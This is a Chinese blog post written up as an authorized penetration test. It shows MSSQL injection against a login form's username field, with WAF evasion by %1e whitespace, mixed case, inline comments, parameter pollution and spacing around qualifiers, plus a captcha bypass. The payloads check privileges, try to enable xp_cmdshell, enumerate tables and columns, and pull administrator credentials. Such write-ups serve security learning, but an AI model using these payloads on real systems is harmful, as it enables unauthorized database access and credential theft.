记一次实战MSSQL注入绕过WAF

已于 2024-05-11 13:58:03 修改
阅读量47 收藏
点赞数
分类专栏: web渗透经典案例 文章标签: 渗透实战
于 2022-01-19 23:04:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/126611761
版权

本次测试为授权测试。注入点在后台登陆的用户名处


存在验证码,可通过删除Cookie和验证码字段绕过验证

添加一个单引号,报错 

and '1'='1

连接重置——被WAF拦截


改变大小写并将空格替换为MSSQL空白符[0x00-0x20] 

%1eaNd%1e'1'='1

查询数据库版本,MSSQL 2012 x64 

%1eoR%1e1=@@version%1e--

查询当前用户 

%1eoR%1e1=user%1e--
​​​​​​​

查询当前用户是否为dba和db_owner 

;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --
;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --

均出现延时,当前用户既不是dba也不是db_owner


尝试执行xp_cmdsehll,没有相关权限 

;eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e --
;eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e --


查询当前数据库,连接重置——被WAF拦截 

%1eoR%1e1=(db_name()%1e)%1e--


去掉函数名的一个字符则正常返回——WAF过滤了函数db_name()。MSSQL和MSQL有一些相同的特性,比如:函数名和括号之前可用注释或空白符填充 

%1eoR%1e1=(db_name/**/()%1e)%1e--


查询当前数据库的表,连接重置——被WAF拦截 

%1eoR%1e1=(SelEct%1etop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--


删除select后面的语句,返回正常。在IIS+ASPX的环境里,如果同时提交多个同名参数,则服务端接收的参数的值为用逗号连接的多个值,在实际应用中可借助注释符注释掉逗号 

%1eoR%1e1=(SelEct/*&username=*/%1etop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--

依然被拦截


删除infOrmatiOn_sChema.tAbles的一个字符则返回正常——WAF过滤了infOrmatiOn_sChema.tAbles。以前在学习MYSQL注入时看到官方文档有这样一句话:"The qualifier character is a separate token and need not be contiguous with the associated identifiers." 可知限定符(例如'.')左右可插入空白符,而经过测试MSSQL具有相同的特性。infOrmatiOn_sChema.tAbles -> infOrmatiOn_sChema%0f.%0ftAbles 

%1eoR%1e1=(SelEct/*&username=*/%1etop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--


可通过not in('table_1','table_2'...)的方式遍历表名

手工注入使用这种方法太慢,一次性查询所有表名 

%1eoR%1e1=(SelEct/*&username=*/%1equotename(name)%1efRom bak_ptfl%0f..sysobjects%1ewHerE%1extype='U' FOR XML PATH(''))%1e--


根据表名判断管理员表应该为appsadmin,一次性查询该表的所有列 

%1eoR%1e1=(SelEct/*&username=*/%1equotename/**/(name)%1efRom bak_ptfl%0f..syscolumns%1ewHerE%1eid=(selEct/*&username=*/%1eid%1efrom%1ebak_ptfl%0f..sysobjects%1ewHerE%1ename='appsadmin')%1efoR%1eXML%1ePATH/**/(''))%1e--&password=admin


获得管理员用户名和密码字段:AdminName、Password。查询用户名和密码 

%1eoR%1e1=(SelEct/*&username=*/%1etOp%1e1%1eAdminName%1efRom%1eappsadmin%1e)%1e--
%1eoR%1e1=(SelEct/*&username=*/%1etOp%1e1%1epassword%1efRom%1eappsadmin)%1e--


解密后成功登陆后台

渗透测试中心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql 注入 绕过防火墙_新型渗透手法:利用XSS绕过WAF进行SQL注入
weixin_39852491的博客
02-18 259
*本文作者:风之传说,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。0×00 前言看到标题,很多人肯定会一脸懵逼,这是什么鬼。利用xss绕过waf进行sql注入?话说,没点意思的文章,我自己也不好意思写出来啊。通俗讲,就是XSS和sql注入相结合绕过waf。知识要能灵活运用嘛。做一个灵活的胖子(虽然我不是胖子)。0×01起因咳咳,还是来说下起因吧!最近遇到一个网站,有防火墙,而且极其变...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
MSSQL WAF绕过(2)
weixin_34080951的博客
01-23 595
0x00 前言 上次的绕过太简单,也没有能注出数据或者获取权限,这次继续绕过,获取数据 0x01 过程 还是上次的站点,简单的判断,存在注入 发现and 数字、exec、union select、 select 数字。。。被过滤 发现execute函数没被过滤,狗没出来说明这个函数能用 execute('sql语句') //execute函数中可以写sql语句,且为字符串,那么就可以传入一些...
数据库语法整理及WAF绕过方式
程序员小麦的博客
06-24 1194
关系型数据库:指采用了关系模型来组织数据的数据库。
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2029
针对WAF绕过
SQL注入WAF绕过技巧
永远是少年
08-11 2706
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入WAF绕过技巧。 一、数据层面绕过WAF 二、方式层面绕过WAF 三、其他方式绕过WAF 四、写在最后
MySQL绕过WAF实战技巧
MachineGunJoe666
05-17 278
本人喜欢遇到好的东西,互相学习,共同进步。在安全行业也有些曲折,发过工控协议fuzzing的入门教程,也发过无线安全的渗透测试脚本。这次发个web的吧。仅供学习,本人也是小菜。大牛直接飞过吧。绕过方千变万化,思路+知识积累是不可或缺的。希望这篇文章对学习bypass的小伙伴有用。本人也在学习和搜集关于oracle的一些绕过waf技巧,有感兴趣的可以互相学习,探讨。
WEB漏洞-SQL注入之堆叠及WAF绕过注入(sql学习笔
qq_19375535的博客
07-02 328
sql学习笔
sql注入各种绕过
weixin_42478365的博客
08-01 7577
sql注入绕过
深入了解SQL注入绕过waf和过滤机制
02-11
SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计设备、访问控制设备、架构/网络设计工具和...
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
深入理解SQL注入绕过WAF和过滤机制
12-21
0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料
mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗
7Riven's blog
11-07 3294
1.注入类型 布尔盲注:http://192.168.232.174/Test.aspx?id=1and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100 验证如下: 时间盲注:http://192.168.232.174/test.aspx?id=1;if (ascii(substr...
SQL注入实战绕过操作
ting_liang的博客
01-27 1496
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
sqlmap注入之tamper绕过WAF防火墙过滤
热门推荐
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
SQL注入绕过
HOU_XIAO_BAI的博客
11-23 867
strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1。在MySQL里,多行解释 是 /* */,这个是SQL的标准 但是MySQL扩张了解释 的功能比如注释/**/在起头的/*后头加了!把要使用的查询语句放在/*。*/中,这样在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行。有的waf只会对关键词过滤一次,这时候采用双写的方式可以绕过。/**/ ,(),`,tab,两个空格。
SQL注入绕过技巧
2301_77160226的博客
06-10 2582
SQL注入绕过技巧
SQL注入绕过WAF
weixin_35753431的博客
02-13 261
SQL注入绕过WAF的方法有很多种,其中一些常见的方法包括: 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 使用多语句查询来绕过WAF,例如将“;”替换为“%3b”。 使用不常见的SQL关键字来绕过WAF,例如使用“version()”代替“@@version”。 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 使用已知的WAF绕过技巧来绕过WAF,...
咖啡店管理系统 (Java 版) 源代码+使用说明+可做毕设
最新发布
06-17
咖啡店管理系统 (Java 版) 源代码 项目简介 这个 Java 项目是一个简单的商店管理系统。该系统处理任何咖啡酒店的业务细节。要制作这个项目,你需要 JetBrains IntelliJ IDE。这个 IDE 将为项目提供设置。你还需要 PostgreSQL 作为数据库。设计简单且用户友好。 系统介绍 关于 Java 版咖啡店管理系统,该系统处理酒店用户的管理。在使用系统之前,你需要先注册然后登录系统。从那里你可以管理你的工作空间,你可以添加客户,管理销售并进行更新。 设计非常简单,用户在操作时不会遇到困难。该项目易于操作和理解。要运行此项目,你必须在电脑上安装 Eclipse IDE 或 JetBrains IntelliJ IDE。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值